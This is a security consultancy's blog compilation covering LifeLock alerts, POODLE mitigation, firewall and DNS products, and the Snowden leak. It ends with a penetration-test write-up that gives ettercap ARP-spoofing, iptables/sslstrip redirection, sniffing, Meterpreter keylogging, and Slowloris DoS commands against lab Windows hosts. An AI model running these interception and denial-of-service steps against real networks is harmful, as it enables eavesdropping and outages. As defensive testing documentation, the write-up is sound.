Lifelock Alerts – You’ve Been Hacked or A Social Site Was…Where’s the Proof Lifelock?

Recently I was made aware that my personal email account was some where on the black market from an alert from Lifelock. OK, I can see how that can happen when LinkedIn dropped the ball on security. It was attributed to the LinkedIn Hack from a while back in 2012 and now the spoils of hacking resurfaced May 2016.


In May 2016, LinkedIn had 164 million email addresses and passwords exposed. Originally hacked in 2012, the data remained out of sight until being offered for sale on a dark market site 4 years later. The passwords in the breach were stored as SHA1 hashes without salt, the vast majority of which were quickly cracked in the days following the release of the data.

Compromised data: Email addresses, Passwords

The website havieibeenpwned has recorded the hacks and is a great source to use. The reason why I point you to that site is from a call to Lifelock that didn’t go the way I wanted it to go. First off I wanted to know what site out there has my information that they were able to scour and find. Lifelock Operator “I’m sorry sir, we don’t have that information in the alert. I can only see what you see. I do know that they scan 10,000 sites for this information.” Yes OK great, now please go get your supervisor. Supervisor “Sir, yes its true this happened and we urge that you change your password and maybe even your email account altogether.” OK Ms. Supervisor but where did you get that information from? I work in security and I work with ones and zeroes. Apparently, I can’t get away from the zeroes. If the site exists you must have a record somewhere with my email address and old password is located. All Ms. Supervisor could do was re-state the obvious that they didn’t have the information. How about your IT department I said, can they help us out? Nothing.

So later on trying to do something else I hop over to Netherlands and try to get some email and wouldn’t you know some Google Alerts say “hey someone tried logging in with your account”. I’m like yes, me. Shortly after the next day Lifelock gets the same thing and I get an alert sent to my cell. OK this is how Lifelock works. Working with Google finding out when someone attempted to use my account. Not impressing me.

Lifelock is basically selling Cyber Insurance and are not providing the details of where they found my information. This post is to challenge you to think what exactly are we getting for a service that I can’t get from News Sources on the web about breaches. Where is the proof Lifelock? That is my challenge to you. Don’t call me up and tell me something is out there…we all know that.

While you’re browsing the web, here is a nice article, recent too, about identity protection services not what its cracked up to be. Why Identity-Theft Protection Isn’t All It’s Cracked Up To Be (Kaveh Waddell)

A better eyebrow raiser Despite Promises, Lifelock Knows Public Data is A Risk Guess I’m not the only one calling Lifelock out in the street.

Too Silo’d to React, Now Respond.

Ever think what would happen if you ever got hacked? Maybe you are wondering if the IPS guys or the HIPS guys are really doing their jobs? In corporate America it is real easy to overlook a lot of precautions and security because you’re just too leveraged. Today’s threats are evolving as bad actors continue to find ways inside. They utilize social sites and technology, human frailty of being needed, and work their way through with some advanced IPS and IDS and Anit-X evasion techniques. So what are you to do?

Looking at the problem in your cube doing your work on your piece of the asset. Your mind tends to think “OK this is what I have to do and I move on to the next asset and service on that asset.” That is all you can touch. You’re ethical hacking group is looking too busy or not too busy to assist and maybe they can or cannot really find all the holes in your security posture. How about a resident hacker just for that client or span of control of clients that you have. Where one can check the security by reviewing the vulnerability report made with hacking tools. However, the key difference here is not to pay for a once a year penetration test but make it so that you test regularly. Red team vs. blue team and then provide results to management. Also, just testing monthly to make sure patches and firewall rules are in place would be great. I think this would be one of the best security practices a company could get into. RedSeal is a software solution that provides visibility into an organizations security by analysing configurations and building out the network diagram. It can then import vulnerability reports and host information to really give you the what if scenario that you have been thinking about in your cube. It will also give you your list of objectives to test and make sure you that the holes found are true and need to fix.

Security is not something you buy or do once in a while. It’s a practice built by defined policies and procedures that are completed over and over again. If you think you are failing to practice the right procedures every day or that your vigilance is intermittent, then I think you are a good candidate for some building security into everyday operations 101. Yes, a bit wordy there but think about it, its not rocket science the hurdle is time, the silo, and the recognized concept.

In conclusion, the best security is a resident security expert allowed to do their job by proving tools and processes. If you cannot get a resident hacker or spend time doing this allow me to make some suggestions. Get a requirement opened from HR to fill this role or hire a service from a firm that understands vulnerability assessments and penetration testing.  Allow them to practice regularly providing results to you and maybe you can stay out of the news. Security awareness and training also helps prevent attacks because users bring the risk in from their computers. The biggest tools to get in are Adobe Flash & Reader, Java, and spear phishing.

If you have any questions or comments or looking for advice on services and where to go, feel free to contact me

OpenDNS – Use It!

OpenDNS – Use It

I cannot say it enough. Wherever I go and when I can, I always advocate using OpenDNS. They screen the web urls before you do. So you will never hit a bad site. Defense in depth is addressed here as well. You need to watch your perimeter as well as the deep inside where your users reside. In fact most cases in hacking events today involve end users. What do they do all day ? Work and when they get a chance to blow off steam or check on personal email you open yourself up for risk. This means that all the end users open your company up for attack via data leakage, IP losses, and corporate espionage. What’s funny, when companies buy other companies they inherit the risk associated with their systems. Has anyone really ever thought about the risk inherited by hiring you, the employee? Maybe the board will start to re-think M&A and apply it to the microcosm in the work place.

Recently SANS news Bites released an article about OpenDNS and detecting domain shadowing.

–Detecting Suspicious Domains
(March 5, 2015)
Technology being developed by OpenDNS aims to hasten detection of
malicious websites and domains. The technology, called Natural Language
Processing Rank (NLPRank), checks for suspicious site names. To reduce
the incidence of false positives, it also checks to see if the domain
is running on the same network that the organization it claims to be
from actually uses.
[Editor’s Note (Northcutt): OpenDNS is a really cool operation and if
you are not using it for your home network you should really consider
it; this goes double if you are a parent. And NLPRANK is an idea whose
time has come. The idea of registering domain names that are similar to
valid and trustworthy names e.g. is not new. What is
fairly new is the ability of attackers to prepare an attack, register
these slightly-off domains, embed them in tiny urls, phishing links in
emails, etc., and mop up the opportunities the people that succumb to
the attack present them in a very short period of time. In manufacturing
and quality control, people are very sensitive to cycle time. We need
to apply that type of mindset in defensive cybersecurity: ]

The article comments on the ability of NLPRank which is natural language processing rating system where for example, a domain name registered recently, with bad spelling/purposely misspelled, and or bad email registrant information will give the domain a negative rank. This would be blocked from users that utilize OpenDNS or a warning showing its risky like WoT did with their color scheme for web site search results. The system is still in testing at the time of this writing but should be usable in the near future. Hats off to OpenDNS, continuing to shock and wow the world and giving people and businesses an edge in thwarting cyber criminals.

Sentrix – Defending Your Web Presence


What is Sentrix ? – Sentrix is a company that provides defense for your web presence on their hardware and not yours. This includes database backend protection from having a hardened front end. In addition they provide DoS, DDoS, and web application protection. I am sure I am missing a few others but you get the point. What really makes me think this company has a sound cloud based solution is that its context aware. This is akin to being application aware like with Palo Alto firewalls.

Sentrix reviews the site and based off the context it builds a replica of the site. Proof of conepts can be built in 24 hrs for testing with no impact to production servers. It’s really worth it to go for a test drive and watch how this works. That leads us to the next topic of how it works. When Sentrix scans and reviews your site it creates two categories in which the presentation and functionality resides. One bucket is called the presentation bucket and the other bucket is called the business transaction bucket. It also builds whitelist rules that allows some transactions to go back to the original server (your server) like username/passwords and authentication. Everything else stays right there on the replica.

When a site is built you have access to a dashboard where you can start working on your field validation for what characters and actions are allowed in each field. each replica automatically provides rules for you to start with becuse its context aware. Here going forward you can edit them as well as network settings. You can also use human validation settings like captcha to help ensure people are viewing and not scripts or bots.

DoS and DDoS protection is done by creating rules for a queue if connections increase rapidly. It will also spin up more gateways as needed to service the load of connections. Also, you can just deny connection rates over a certain rate to ensure that your site stays up. So yes web application, Application DoS, and other threats can be mitigated with Sentrix. I am very impressed with the technology. Now they just need some Superbowl commercials and I think everyone will get the message.

Why use a Cloud when you can Build Your OWNCLOUD and Btsync Backup Server

Anyone wishing to retain rights and privacy to their information without relying on cloud services like Google, iCloud, or even other services Western Digital My Cloud. Look no further. Netwerk Guardian LLC can install your OWNCLOUD and Btsync server just for you. Small businesses are enjoying backups now over encrypted TCP or UDP with Btsync. It has been around for almost 2 years. We have the technology here for you so you can backup your data and content your way and to whoever you want to see it.

  • OWNCLOUD is free we just install it for you and set you up.
  • Btsync is free
  • Bring your own hardware, or will provide for you (Best option, purpose built).
  • You are now free! Come join a million strong as we take back our privacy with your data. We install, educate, and if you want, we can manage it or teach you how.



    POODLE – What to do about it (CVE-2014-3566)

    POODLE CVE-2014-3566 is a vulnerability where negotiations between client and server result in a lower security protocol (from TLS 1.0 to SSLv3) being used in which oracle based side channel attack can leak predictable padding and give an attacker utilizing MITM the upper hand in obtaining ciphertext, session IDs, and decrypt them. There is a possibility for hijacking sessions when users go off corporate security infrastructure to other sites. Work around are suggesting to down grade to SSLv2 from SSLv3 but I would suggest the opposite. Use TLS 1.1 or 1.2. Have users work from within the corporate network, go to safe sites, DO NOT USE Hotspots and open WifFi connections for business related activities. A lot of applications like Java, ASP,NET, Ruby on Rails, C+, Pyhton, Perl, PHP, and ColdFusion are targets for this padding side channel attack. Maybe even forcing 24×7 VPN connections and forcing users to go through corporate security infra-X will help protect corporate assets. End users should not use corporate computers for personal use until this is resolved. There are settings in browsers and on Windows computers to force using various SSLv2 settings or TLS 1.0 or higher settings found here,news-19775.html

    Check your browsers here

    Browser Fixes
    Mozilla Firefox

    Type about:config into the address bar and hit Enter or Return. Click “I’ll be careful, I promise!” in the resulting warning window. Scroll down the list of preferences and double-click “security.tls.version.min”. Change the integer from 0 to 1 and click OK.

    Google Chrome

    For Google Chrome, you’ll have to temporarily become a power user and use a command line. The instructions are a bit different for Windows, Mac and Linux.

    In Windows, first close any running version of Chrome. Find the desktop shortcut you normally click to launch Chrome and right-click it. Scroll down to and click Properties. Click the Shortcut tab. In the Target field, which should end with “/chrome.exe”, add a space, then add this: “–ssl-version-min=tls1” (without quotation marks). Click Apply and then OK.

    Microsoft Internet Explorer

    Click the Tools icon in the top right corner (the icon looks like a gear). Scroll down and click Internet Options. In the resulting pop-up window, select the Advanced tab, then scroll through the list of settings until you reach the Security category. Uncheck Use SSL 3.0, click Apply, and then click OK.

    Diving Deeper

    Leaking of information as written per wiki is the norm when padding to match the underlying cryptography. This is the case for ECB and CBC decryption used in block ciphers. Attackers could decrypt as well as encrypt messages using server keys and not knowing the keys themselves. The issue is the predicate-able padding and initialization vectors being implicit instead of explicit. While solutions for servers are to upgrade OpenSSL I would move to something stronger and force clients to do the same. If we do not push for better security now, then when? Yes there will be some pains in the transition but I believe if we fend off the attackers at the perimeter and on the users inside, we will all be better off. Web servers using TLS 1.2 is only around 18% according to Qualys. Qualys further stated moving up to TLS 1.1 or 1.2 doesn’t mean BEAST attack is thwarted but that there could be another attack vector not known yet.

    Palo Alto Firewalls – There is Nothing Else Left to Compete


    I just finished up taking the PAN 201 and 205 classes. Had I known that these firewalls can do all that it does 2 years ago, I would have trained earlier. Where can you get a firewall that inspects traffic in real time, a single pass technology (Single Pass Parallel Processing), reviews packets up to 5 ways with App-ID before deciding what to do with it (worse case). This is just App-ID. There is still Content-ID and User-ID for policing traffic into and out of your network. Remember security is everyone’s job and watching what leaves your organization is just as important. You don’t want to be part of a botnet network. You don’t want your secret sauce leaving either.

    App-ID Inspection
    The traffic is classified based on IP and port, next for review the signatures are then applied to the allowed traffic (so that’s two) then if the App-ID determines that encryption SSL or SSH is used you can write a decryption policy (if legally allowed). The fourth inspection is known protocol decoders for additional context based signatures to see if applications are tunneling traffic inside. This helps avoid salami attacks or data diddling. When traffic leaves in small chunks back to C&C, this known decoders helps very well. When that does not work there is heuristics used to see if the behavior of packets are normal and then it passes.

    There are three paths traffic can take even when being analyzed. We start with FW session setup/slowpath or we could use FW Fast path, or or Application Identification. It can decrypt SSL and SSH traffic (Not HIPAA, banking financial) to determine if the content inside is legitimate or not and then it can toss or re-encrypt and send it on to destination. The firewall allows for a subscription based service to Wildfire for malware and threat protection and ….analysis. Hands free administration right there folks. Brightcloud offers the url filtering service. Wildfire for threat protection and sandboxing. Upload files for review up to 10 MB. There is so much to say about this firewall. It even has packet capture capability right there on a policy or filter to aid in troubleshooting connectivity or an incident. No more running out to the data center floor or waiting for an approved change. It has App-ID to look at applications and that they behave as they should. No more ports open and let that traffic just ride on in there. It will lay the smackdown on any traffic not adhering to signature or behavioral patterns. Does your Cisco or Checkpoint do that? Really? How well does it do that? What buffer? Did you say lag to analyze your traffic? Well sorry to hear that. Palo Alto appliance have dedicated hardware multi-core security processor, network processor, signature match processor, to do all that security.

    Control plane works with and independently of the data plane. Reboot one and not the other or both. Have visibility while rebooting or leave the traffic run and reboot the management. No more waiting for off hours to make changes. There are 15 steps in the flow logic that all traffic may go through.

    Heck, we haven’t even touched Global Protect (VPN) which can extend the corporate borders anywhere and provide more protection. Think about security and what would you like to do. You want to be safe, see it when it happens if it does right? Guard against future incidents right? This is the firewall for you. I have worked with many firewalls Checkpoint (used to be favorite) Juniper, and Cisco ASA (I tested in and past). Nothing compares to Palo Alto. If I were the other vendors I’d start looking for another job if I were them.

    More to come on this story. Check it out for yourselves. Palo Alto Networks

    For a good start into how this technology works take a look at this from Palo Alto

    © 2013 Palo Alto Networks
    Page 3
    Executive Summary: The Need for a Single-Pass Architecture
    For many years, the goal of integrating threat preven
    tion services into the firewall has been pursued as
    a means of alleviating the need for additional devices
    for functions such as IPS, network antivirus, and
    more. The pursuit of integrating th
    reat prevention functions into the firewall makes perfect sense – the
    firewall is the cornerstone of
    the security infrastructure.
    Current integration iterations carr
    y a variety of different labels – deep inspection, unified threat
    management (UTM), deep packet
    inspection, and others. Each of
    these iterations share a common
    problem, which is a lack of consistent and predictabl
    e performance when security services are enabled.
    Specifically, the firewall functions
    are capable of performing at high
    throughput and low latency, but
    when the added security functions are enabled,
    performance decreased while latency increased.
    The Palo Alto Networks Single-Pass Parallel Proce
    ssing (SP3) architecture addresses the integration and
    performance challenges with a unique single-pass a
    pproach to packet processing that is tightly
    integrated with a purpose-built hardware platform.

    Single-pass software:
    By performing operations once per packet, the single-pass software
    eliminates many redundant functions that plagu
    e previous integration
    attempts. As a packets
    are processed, networking, policy lookup, a
    pplication identification and decoding, and
    signature matching for any and all threats
    and content is only performed once. This
    significantly reduces the amount of processing overhead required to perform multiple
    functions in one security device. The single-pass software uses a stream-based, uniform
    signature matching engine for content inspect
    ion. Instead of using separate engines and
    signature sets (requiring multi-
    pass scanning) and instead of usin
    g file proxies (requiring file
    download prior to scanning), the single-pass arch
    itecture scans traffic for all signatures once
    and in a stream-based fashion to avoid the introduction of latency.

    Parallel processing hardware:
    The single-pass software is then integrated with a purpose-built
    platform that uses dedicated processors and me
    mory for the four key areas of networking,
    security, content scanning and management. Th
    e computing power within each platform has
    been specifically chosen to perform the processi
    ng intensive task of
    full stack inspection at
    multi-Gbps throughput.
    The resulting combination delivers the horsepower
    required to achieve consistent and predictable
    performance at up to 20 Gbps of throughput, maki
    ng the goal of integrated firewall and threat
    prevention a realit

    Snowden Picking Info Off the NSA Network – What Went Wrong

    As agreed I’d revisit this article from Computer World

    The story is just screaming some basic fundamental but glaring omissions in the security practice. In the CISSP study material by lesson 3 or in the beginning they address least privilege roles and mandatory and discretionary controls. Where is the payoff of hiring someone with a CISSP working for the NSA who failed to demonstrate this practice? Why is it that we can see when people access certain shares and yet the big machine cannot?

    The documents were kept in the portal so that NSA analysts and other officials could read and discuss them online, NSA CTO Lonny Anderson told National Public Radio in an interview Wednesday.

    As a contracted NSA systems administrator with top-secret Sensitive Compartmented Information (SCI) clearance, Snowden could access the intranet site and move especially sensitive documents to a more secure location without raising red flags, Anderson said.

    Thus, Snowden could steal the NSA Power Point slides, secret court orders and classified agency reports that he leaked to the media. “The assignment was the perfect cover for someone who wanted to leak documents,” Anderson told NPR.

    “His job was to do what he did. He wasn’t a ghost. He wasn’t that clever. He did his job,” Anderson said.

    That above mentioned quote should get a knee slap at happy hour for being duped by Snowden. While he wasn’t “clever” Ms. Anderson to hack in and get the loot he was clever enough to do it and leave before you stopped him. He went right in the front door and did it right under your nose. You’d be wise to allow only the people that need to know actually perform the technical work with the same controls mentioned below here with tagging a.k.a. similar to audit trail enabling.

    The NSA has also started “tagging” sensitive data and documents to ensure that only people with a need to see a documents can access it. The document tagging rule also lets security auditors see how individuals with legitimate access to the data are actually using it, Anderson said.

    This leads the general public to believe that you are using some Windows file share system and not a content delivery system that has audit trail turned on from design and the start of the system. This brings me back to my pharmaceutical days where there was a vendor Agilent who made a document system where one could see research and look up based on metadata. The NSA could learn a lesson here.

    The following excerpt of the article indicating a response from Eric Chiu, is one I disagree with. While role based security is nice for the group, let’s look at the individual. As stated by Mr. Chiu

    “Companies need to shift their thinking from an outside-in model of security to an inside out approach,” said Eric Chiu, founder of Hytrust, a cloud infrastructure management company.

    “Only by implementing strong access controls [like] the recent NSA ‘two-man’ rule as well as role-based monitoring, can you secure critical systems and data against these threats and prevent breaches as well as data center failures,” he said.

    Where is the detailed log of the individual user? In discretionary access control the user can make policy decisions contrary to mandatory access control. From the wiki for quick reference

    With mandatory access control, this security policy is centrally controlled by a security policy administrator; users do not have the ability to override the policy and, for example, grant access to files that would otherwise be restricted. By contrast, discretionary access control (DAC), which also governs the ability of subjects to access objects, allows users the ability to make policy decisions and/or assign security attributes. (The traditional Unix system of users, groups, and read-write-execute permissions is an example of DAC.) MAC-enabled systems allow policy administrators to implement organization-wide security policies. Unlike with DAC, users cannot override or modify this policy, either accidentally or intentionally. This allows security administrators to define a central policy that is guaranteed (in principle) to be enforced for all users.

    I believe the correct solution would be a Lattice based access control implementation where the user can only access data if their security designation is greater than the target AND there is user logging while in the system.

    Now taking this story down the rabbit hole what makes you think that glasses wearing Snowden didn’t go in and read the documentation and record it with super spy glasses? How about the cell phone camera? How about a phone call with him reading verbatim the information right off the screen? These are also fundamental physical breaches that may or may not be considered as this can be done in plain sight. Why was he accessing so many files? Why wasn’t the 6 month security access check picking up on his behavior? Why isn’t the NSA watching their own people more closely than they are watching us? How come Israeli people can detect malicious people in airports by watching and interviewing them with no mechanical screening but the old fashion way?

    Penetration Testing with Linux – Featuring Kali and Armitage

    Netwerk Guardian LLC is bringing this to you showing what can be done penetration testing with Kali or Backtrack and using Armitage. This is a technical subset of my thesis on Effective Penetration Testing. So without further delay…

    Penetration testing with Linux is one of the best ways to perform tests. It is a
    versatile tool. Linux comes in many flavors like Backtrack5 RC3 or now Kali. Linux allows for the customization of the software itself plus the tools that you use. Therefore, the customization and level of sophistication is limitless. This article will cover using Backtrack5 RC3 and Armitage for the test as it was executed during the pen test. This article may not cover all features of Armitage. However, in order to provide you a better understanding of Amritage, Kali will be used as well in different screenshots. Note that Armitage is no longer supported under Backtrack with the recent release of Kali in early 2013. We chose to use Kali in this article to show you something recent but the other versions of Linux are still very good tools to use in the field.

    Backtrack comes loaded with metasploit and as you know in order to find and run an exploit you have to switch to the directory and run the commands specific to it. This is no longer the case with Kali and the FHS (Filesystem Hierarchy Standard) Kali has taken care of this to make all commands system wide accessible from the command line. Armitage provides a nice GUI interface to Metasploit. It also has a dashboard you can use for setting up the hosts or network you are going to target. You can import hosts from files associated with other network security assessment tools like Nessus, IP360, and Burp session xml. Armitage imports anything from a text or xml file. You can use some of the automation presented with Armitage. In addition, it is wise to use customized these scripts when delivering a penetration test. You never really know what the outcome may be unless you test in a lab first. The great thing about Armitage is that it has a database of known vulnerabilities and attacks in which you can draw from in your test. This helps save time and keep you focused but not all exploits work as targets can be hardened. Customizing scripts and Linux has long been the core of these releases. Armitage can be used as a standalone tool as well as network solution when working with other pen testers. There are a few reporting options that can be used with Backtrack or Kali to save your work and share results or progress. Armitage has its own place to store evidence in data format but not in a report format that would be all inclusive. This is what is called loot where the results go.

    Launching Armitage comes from navigating to the Applications menu item and following the terms Kali Linux > Exploitation Tools > Network Exploitation > Armitage (Image 1). In this new installation of Kali, you will have to manually type the following commands in order to get Armitage to connect to the database. They are; service postgresql start and service metasploit start. Once these are entered, you can start Armitage successfully using the install default user name msf and password test.
    Image 1

    Next there are a series of prompts that you will be directed to for launching and customizing port usage. Once Armitage is open we can begin using it to scan for hosts or network subnets. Just launch nmap (Image 2) from within Armitage and choose to add a host or scan a network with several scripted choices. The rules are the same for using nmap in Armitage and by itself. There are aggressive scan and quieter scans. So choose wisely in order to remain quiet. The machines we want to target are and One is a server hosting the core business application and the other is a typical user workstation. See image 3 below from the previous run pen test Armitage on Backtrack5 RC3.

    Image 2 (Launching nmap within Armitage)

    The next step you want to use is the find vulnerabilities scan. This takes Armitage and scans the hosts out there and it comes up with a proposed list of attacks. Now not all and every attack is going to work. It will give a type of technology to exploit. This coupled with your experience and training can then discover that it may or may not be successful. This is where the pen tester needs to be on their best game to find an exploit in which to launch a payload. What is good about Armitage is that each exploit or payload you try opens a new tab. So you can see what works and doesn’t and where to go next.
    Now that we have our hosts found, targeted, and with an attack list, we can proceed. Since the machines were Windows based, we quickly went to this exploit to see if there was a way to pwn the boxes. In Armitage you can assign accounts to each host that is used to login and run the payloads. We chose many exploits but found that only one really works and will be addressed later. Below in Image 3 you can see that when a system username and password are known and the Login > psexec is used, the lightning is seen all around it.

    Image 3 (Note the lightning around Hosts = pwned)

    In the pen test shown here the machines’ administrator accounts were known in a white box test to see if we can sniff traffic from the core business application. The objective is that we are going to imitate an insider threat or demonstrate beyond passing the hash for Windows users in the network.
    The following shows what we want to test. This is taken from a lab setup a typical company using earth materials management system. The network is made of Microsoft Windows machines with Windows 7 for end users and Windows Server 2008 R2. The objective is to look for vulnerabilities on the host machines to see if we can capture data on the hosts going across the network to the server for corporate espionage.
    1. Test Core Business Application
    a. Test core business application against
    i. Clear text traffic capturing
    ii. Man in the middle (MITM)
    iii. Spoofing
    iv. Armitage w/Meterpreter
    v. DoS Slowloris

    Port Scanning Results and Issues
    Scanning Windows machines

    The first test was scanning of services and ports on Microsoft devices. The test discovered the default Windows system ports open for unsigned SMB, telnet, and high ports. This included the port scanning by Nessus as well as the Microsoft Baseline Analyzer. The results from Nessus showed that there existed an unsigned SMB/Samba port (445) as well as using the open clear text port channel (23). Nessus found only (1) medium and (1) low alert for the server Port (135) on the workstation was found open and that was used for remote procedure protocol. Port (139) was found open and used with SMB for file sharing with other devices beside Microsoft. Port (808) is the Streetsmarts Web based application running encrypted. Port (992) was found to be an SSL port with a certificate error. Additional ports were found open ranging from (49152-49157) and were due from a release from Microsoft in January 2008 to start the open port range at that (49152). Some P2P (peer-to-peer) file sharing has been known to run over these ports.
    The possible attack that could have occurred but was not conducted in the test was escalation in privileges via SMB vulnerability and brute forcing usernames and passwords. The attacker also could have social engineered the information from an unsuspecting user. There is a probability that this could have happened.

    Armitage has the option for you to ask it what vulnerabilities and attacks could be possible on the chosen target. Just go to the host and select it and then go to the menu Attacks > Find Attacks. It will return a list of possible attacks and say “Happy Hunting!” Therefore, that is exactly what happened.

    The following tools were used to test a vulnerability of unencrypted communication on the LAN (Local Area Network) with ettercap always being used for the MITM. They are SSLstrip, Dsniff, Driftnet, Urlsnarf, and meterpreter.

    Technical Overview – Sniffing MITM Attacks
    Using Ettercap we copied traffic from the user and the gateway to our pent-testing laptop. We used Ettercap with the following in an attempt to see traffic, sslstrip, urlsnarf, dnsiff, and Driftnet with these commands entered. In Ettercap we scanned the subnet and added a target 1 = gateway and target 2 = the victim machine. Here we were able to get a copy of everything being sent by the user to the laptop (attacker) first before going to the real gateway. This is done with sslstrip, iptables, ettercap with MITM attack arp spoofing. It is very important that in a test where you are trying to conceal what you are doing from detection that you must ensure you laptop is able to handle the traffic. You must be ready to execute the sequence of commands in order to avoid seeing packets destined to the same IP address twice.

    Each attack and tool used has its benefits and limitations. The idea was to see data going across for corporate espionage and send to a competitor for money. The tools researched and chosen for this pen test to see what would really come across the wire. The following is a brief overview of each tool.

    SSLstrip – Is a tool that prohibits a connection from upgrading to an SSL session in an unnoticeable way. Also the history behind this is that one could forge a certificate as being signed and trusted in order to appear as an https session or that the session was legitimate with the intended server that actually ended up being the attacker (Wikipedia).

    Dsniff – A tool used to sniff anything of interest like email or passwords. Arp spoof has to be running of course so that the traffic is routed through the attacker PC and back out to the real router and PC (Wikipedia).

    Driftnet – This tool allows you to see what images are going across the user’s browser while surfing the web. In this test users were not on the internet but were using a browser to launch an application which we wanted to see.

    Urlsnarf – A tool that places all visited url output to file for easy reviewing. Not a tool that provides much advantage in this pen test.

    Meterpreter – This tool can be used to take advantage of many vulnerabilities in different platforms in order to gain root access or control of a PC.

    Script Execution
    In the following presentation of code we see that numerous attempts utilizing ettercap and arp spoofing was done to send traffic to the attacker. Each tool was run alongside ettercap to see what information would actually pass to the attacker. The most exciting tools were Driftnet and meterpreter because of what could be seen and the control.

    ettercap –mitm ARP:REMOTE –text –quiet –write /root/sslstrip/ettercap.log –iface eth0
    Also the GUI was used to pick target client Windows 7 machine and second target the application server

    Execute the following commands
    In the CLI we entered:
    root@bt:/# echo 1 > /proc/sys/net/ipv4/ip_forward
    root@bt:/#cat /proc/sys/net/ipv4/ip_forward
    root@bt:# sudo iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000
    Now verify it took the filter
    root@bt:~# iptables -L -t nat
    Chain PREROUTING (policy ACCEPT)
    target prot opt source destination
    REDIRECT tcp — anywhere anywhere tcp dpt:www redir ports 10000
    Chain INPUT (policy ACCEPT)
    target prot opt source destination
    Chain OUTPUT (policy ACCEPT)
    target prot opt source destination
    Chain POSTROUTING (policy ACCEPT)
    target prot opt source destination
    root@bt:# sudo python -l 1000 -f lock.ico

    Results sslstrip: No data or text of any sort was visible, since all data was being passed through an encrypted channel.

    Results with dsniff: Web addresses were visible, but no usernames or passwords. These results show that the application is very secure.

    Results with driftnet: There were no pictures or images of the site going across. There were web addresses being listed.

    Results with urlsnarf: The only thing that came through here was some local address space and some internet address space redacted for publication. Still there were no real gems of information for quick gains.

    Technical Output
    root@bt:~# urlsnarf -n -i eth0
    urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128] – – [15/Jan/2013:23:10:12 -0500] “GET HTTP/1.1” – – “-” “Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)” – – [15/Jan/2013:23:10:13 -0500] “GET – – [15/Jan/2013:23:11:17 -0500] “GET HTTP/1.1” – – “” “Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)” – – [15/Jan/2013:23:11:17 -0500] “GET HTTP/1.1” – – “” “Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)” – – [15/Jan/2013:23:11:17 -0500] “GET HTTP/1.1” – – “” “Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)” – – [15/Jan/2013:23:11:17 -0500] “GET HTTP/1.1” – – “” “Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)” – – [15/Jan/2013:23:11:17 -0500] “GET HTTP/1.1” – – “” “Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)”

    Executed commands (example):
    root@bt:/# echo 1 > /proc/sys/net/ipv4/ip_forward
    root@bt:/#cat /proc/sys/net/ipv4/ip_forward 1

    In another terminal, we used Driftnet
    root@bt:/# driftnet -i eth0
    root@bt:/# driftnet -i eth0 -v -s (in an attempt to gain audio being streamed)
    We could then see what the user was looking at for images.

    Results: Images from core business application were not being sent to our laptop despite driftnet running
    root@bt:~# driftnet -i eth0 -v
    driftnet: using temporary file directory /tmp/driftnet-AmaowM
    driftnet: listening on eth0 in promiscuous mode
    driftnet: using filter expression `tcp’
    driftnet: started display child, pid 2562
    driftnet: link-level header length is 14 bytes
    .driftnet: new connection: ->
    …driftnet: new connection: ->
    …driftnet: new connection: ->
    …driftnet: new connection: ->

    Meterpreter – Meterpreter used in with Armitage a connection made it impossible to glean any data or provide a way to leak data out; Meterpreter was used in this test. Knowing the administrator password, the connection was possible. Even a regular user with a known password would be able to both pass the hash dump and crack passwords later in order to attempt to escalate privileges. Time being the factor is how successful the cracker would be by going slow and password cracking.

    Results: We were able to log keystrokes and take screen shots of the user’s computer. This is one way data could be captured. In this test, we show that key logging and screen captures are possible; however, they are not very effective as shown below, Image 7. Anything that was operating on the application level of the OSI model remained visible and the tool worked. When things went encrypted at the network level it was impossible to see.

    Image 4 – Armitage Text Output of Key logging


    Image 5 – Email Credentials Entered

    Image 6 Screenshot Before Launching Encrypted Application


    Image 7 – After Launching Encrypted Application

    We have seen before that the desktop can be captured with screen shots and information could be leaked this way. However, notice in the image below that the application icon is present as a big ‘S’ in the toolbar, and on the workstation it is in the foreground. However, the image reveals that it is not seen and therefore encrypted to the reverse tcp shell. That ‘S’ represents the business’s core business application. The launch html page is the only visible part of the application, which is done on port 80. This demonstrates that the application running on the computer was able to encrypt all activity for queries, results, and navigation.

    DoS – Slowloris Python Script

    Now we get to some fun. Besides trying to sniff traffic and look at client proprietary data, we can also try to make their systems unavailable to them for this test. Remember that an unavailable system is loss of income or a serious impact that can make generating income and staying operational difficult to do. The script that we will use is a python script called slowloris. This script can be found at There is a script for IPv6 as well. This script is unique in that it does not try to hammer the web server right away with a full load of requests but that it comes in waves. There is a setting in the script for the number of connections per second and the frequency of those connections. These two fields were used against the server. The server was a Windows Server 2008 R2 (fresh install and no updates).

    In order to start the script after you have downloaded it to your pen test PC is by As with any test you start with what is supposed to work and then review the results and make changes. The changes we made were simple as each time slowloris runs it makes a whole bunch of half requests to the web server. The requests never get finished and the web server is just sitting there with a session consumed waiting for the user to resume communication. This weakness is known for some Apache servers but not on IIS 7.0. At the time of this test it was unknown but thought it would be fun to try. Also check to make sure that you have Perl installed perl –v as most Linux instances do.

    We modified the script to change the number of connections and then we lowered the timeout period for waiting to start that new connection. As the script ran we would notice the CPU on the server would spike to 78% and then 100% and then go down again as the script had entered its wait interval. Then it would run again and we would see similar results on the CPU. Now as far as hacking goes if you do not get the results you want just keep trying. So we stopped the script and change the connection per second to the maximum it would take 10,000 per second and again tested. After the second run the Server 2008 R2 would just take a hit but continue to serve out the web page. Unfortunately for the pen tester there was no break in service. Fortunately, for the company running the software they stayed operational. As a side note for non-Linux tool we used the Low orbit Ion Cannon multiple times on the server in addition to slowloris and still the web site was up.

    The following commands will result in the same activity as we tested earlier in 2013. ./ -dns -port 443 -timeout 30 -num 10000 –https

